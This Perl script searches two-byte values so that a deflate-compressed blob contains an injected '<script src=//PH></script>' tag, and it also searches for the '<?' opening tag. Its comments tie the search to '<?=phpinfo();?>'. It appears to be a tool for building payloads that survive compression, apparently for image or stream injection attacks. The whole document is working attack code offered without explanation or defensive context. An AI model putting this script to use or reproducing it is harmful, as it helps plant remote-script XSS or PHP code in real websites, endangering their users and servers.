Bruteforce Deflate Compression

1.  #!/usr/bin/perl
2.  
3.  use strict;
4.  use warnings;
5.  
6.  use IO::Compress::Deflate ':all';
7.  use String::HexConvert ':all';
8.  
9.  print "[+] \"PH\": ". bruteforce("PH") ."\n\n"; # "PH" is from "php" on <?=phpinfo();?>
10.  print "[+] \"<?\": ". bruteforce("<?") ."\n\n"; # "<?" is from "<?=" on <?=phpinfo();?>
11.  
12.  
13.  sub bruteforce {
14.      my $p = $_[0];
15.      for( my $i = 0x0000; $i < 0xffff; $i++ ) {
16.          my $brute = sprintf("%x", $i);
17.          my $bin_brute = hex_to_ascii("0000f399281922111510691928276e6e".$brute."1f576e69b16375535b6f0000");
18.          my $out;
19.          deflate \$bin_brute => \$out or die "Deflate failed: $DeflateError ";
20.          if(index(uc($out), uc("<script src=//".$p."></script>")) != -1) {
21.               print "[+] Brute: $brute - Deflate:  $out\n";
22.              return ascii_to_hex($bin_brute);
23.              last;
24.          }
25.      }
26.      die("[x] Bruteforce on \"$p\" not found !! \n\n");
27.  }